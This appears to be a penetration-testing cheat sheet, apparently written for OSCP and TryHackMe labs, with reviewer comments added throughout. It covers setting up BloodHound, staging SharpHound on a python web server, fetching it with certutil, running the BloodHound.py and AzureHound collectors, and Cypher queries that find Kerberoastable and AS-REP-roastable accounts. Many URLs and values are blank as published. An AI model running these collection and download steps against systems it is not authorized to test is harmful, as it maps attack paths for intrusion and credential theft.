


  • install and run neo4j
  • start bloodhound gui
    # Installs the distribution's bloodhound package through apt.
    sudo apt install -y bloodhound
    # --no-sandbox switches off the Chromium/Electron renderer sandbox. It is
    # usually only needed when the GUI is started as root.
    # NOTE(review): where possible, start it as an unprivileged user without the flag.
    bloodhound --no-sandbox


  • source:
    # NOTE(review): the download URL is missing from this command as published, so
    # it cannot run as written. Take the script from the project's own release
    # and compare its hash with a trusted value before importing it anywhere.
    wget -O /opt/windows/SharpHound.ps1
# Loads the collector script from the current directory into this PowerShell session.
Import-Module .\SharpHound.ps1
# -CollectionMethod All requests every collection method for the named domain.
# NOTE(review): the value for -ZipFileName is missing as published.
# The resulting archive describes the directory in detail; handle it as
# sensitive data and delete it from the host once it has been transferred.
Invoke-BloodHound -CollectionMethod All -Domain INLANEFREIGHT.LOCAL -ZipFileName
# wait, be patient



# NOTE(review): the release URL and the archive file name are missing from these
# three lines as published: wget has no URL, and unzip and rm point at the
# directory /opt/windows/ itself. Restore both before use, and verify the
# archive's hash against a trusted value before unpacking it.
wget  -O /opt/windows/
unzip /opt/windows/ -d /opt/windows/sharpHound
rm /opt/windows/
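# Stage the collector in a scratch web root.
# '&&' rather than '&': cd must run only after mkdir has finished successfully.
# A single '&' backgrounds mkdir, so cd can race it and the later cp and
# server would then run from whatever directory the shell was already in.
mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/sharpHound/SharpHound.exe .
# Serves the current directory, unauthenticated, on every interface at port 80.
# Keep only the file being transferred here and stop the server once it is fetched.
python3 -m http.server 80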
# NOTE(review): the source URL is missing from the next two commands as published.
# Detection note: certutil run with -urlcache -f to fetch an executable is a
# well-known download pattern that endpoint monitoring commonly alerts on.
certutil -urlcache -f SharpHound.exe
wget -O SharpHound.exe
# Runs every collection method against the domain oscp.exam.
# --ExcludeDCs leaves domain controllers out of the enumeration.
.\SharpHound.exe --CollectionMethods All --Domain oscp.exam --ExcludeDCs
# wait, be patient

BloodHound.py is a Python based ingestor for BloodHound, based on Impacket.

echo "==========> Windows:bloodHoundPy"
# NOTE(review): the URL, the archive name and the source argument of mv are
# missing from the next four lines as published. Restore them and verify the
# archive's hash against a trusted value before unpacking.
wget -O /opt/windows/
unzip /opt/windows/ -d /opt/windows/
mv bloodHoundPy
rm /opt/windows/
# NOTE(review): the script name after bloodHoundPy/ and the values for -ns and
# -d are blank as published. A password passed with -p is recorded in shell
# history and is visible in the process list while the command runs.
/opt/windows/bloodHoundPy/ -u 'admin' -p 'xxxxxxxxxx' -ns '' -d '' -c all



echo "==========> Windows:AzureHound"
# NOTE(review): the release URL and the archive name are missing from the next
# three lines as published; unzip and rm point at the directory /opt/windows/
# itself. Restore them and verify the archive's hash before unpacking.
wget -O /opt/windows/
unzip /opt/windows/ -d /opt/windows
rm /opt/windows/
dump all
# Runs 'list' with no object type and writes the result to all.json.
# The -u and --tenant values are blank as published.
# NOTE(review): -p puts the password in shell history and in the process list.
# all.json holds tenant directory data, so store it with restricted permissions.
/opt/windows/azurehound -u "" -p "xxxxxxxxxx" list --tenant "" -o all.json
dump one object type per call
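# Credentials for the per-type AzureHound runs below.
# Named AZ_* rather than USER/PASS/TENA: USER is the login name that shells and
# many tools already rely on, and exporting over it changes it for every child
# process. Plain assignments are enough because only this shell expands them.
AZ_USER=''
AZ_PASS='xxxxxxxxxxxxxxxx'
AZ_TENANT=''
# Confirm the values are filled in without printing the secret itself to the
# terminal or its scrollback.
printf 'user=%s tenant=%s password_set=%s\n' \
  "$AZ_USER" "$AZ_TENANT" "${AZ_PASS:+yes}"
/opt/windows/azurehound --help
/opt/windows/azurehound list --help

# One object type per call, each written to <type>.json in the current
# directory at verbosity 1. The expansions are quoted so that a password
# containing spaces or glob characters reaches the tool as a single argument.
# NOTE(review): -p still places the password in the process list while each
# call runs, and the JSON files hold tenant directory data, so keep them in a
# directory with restricted permissions.
for kind in \
  tenants users groups \
  group-owners group-members \
  management-group-descendants management-group-owners \
  management-group-role-assignments management-group-user-access-admins \
  management-groups \
  roles role-assignments \
  devices device-owners
do
  /opt/windows/azurehound -u "$AZ_USER" -p "$AZ_PASS" list "$kind" \
    --tenant "$AZ_TENANT" -o "${kind}.json" -v 1
done
# Drop the secret from the shell once the runs are finished.
unset AZ_PASS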

Analytics Queries

List all Kerberoastable Accounts

// Returns User nodes whose hasspn property is true, i.e. accounts that carry a
// service principal name. Defensive use: confirm each one has a long random
// password or is a managed service account.
MATCH (n:User) WHERE n.hasspn=true RETURN n

Find users that don’t require Kerberos pre-authentication (aka AS-REP Roasting)

// Returns User nodes whose dontreqpreauth property is true.
// Defensive use: re-enable Kerberos pre-authentication on these accounts
// unless there is a documented need for the exception.
MATCH (u:User {dontreqpreauth: true}) RETURN u

Find servers a user can RDP into.

// Matches CanRDP edges from groups whose objectid ends in '-513' (the RID
// suffix of Domain Users) to computers whose operatingsystem contains
// 'Server'. The result is therefore the servers every domain user may RDP
// into, not the access of one named user.
match p=(g:Group)-[:CanRDP]->(c:Computer) where  g.objectid ENDS WITH '-513'  AND c.operatingsystem CONTAINS 'Server' return p

Find all sessions any user in a specific domain has

// Returns HasSession edges from computers to users whose domain property
// equals the quoted value exactly. ZA.TRYHACKME.COM is a lab domain;
// substitute the domain under review.
// NOTE(review): BloodHound appears to store domain names in upper case; confirm.
MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain: "ZA.TRYHACKME.COM"}) RETURN p

View all groups that contain the word ‘admin’

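// Returns Group nodes whose name contains "ADMIN".
// CONTAINS needs a left-hand operand; without one the query does not parse.
// n.name is the node's name property. The comparison is case-sensitive.
// NOTE(review): BloodHound appears to store names in upper case; confirm.
Match (n:Group) WHERE n.name CONTAINS "ADMIN" return n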

View all users that contain the word ‘admin’

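// Returns User nodes whose name contains "ADMIN".
// CONTAINS needs a left-hand operand; without one the query does not parse.
// n.name is the node's name property. The comparison is case-sensitive.
// NOTE(review): BloodHound appears to store names in upper case; confirm.
Match (n:User) WHERE n.name CONTAINS "ADMIN" return n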

View all computers

// Returns every node labelled Computer. The result is unbounded, so on a
// large graph consider appending a LIMIT clause.
MATCH (p:Computer) RETURN p;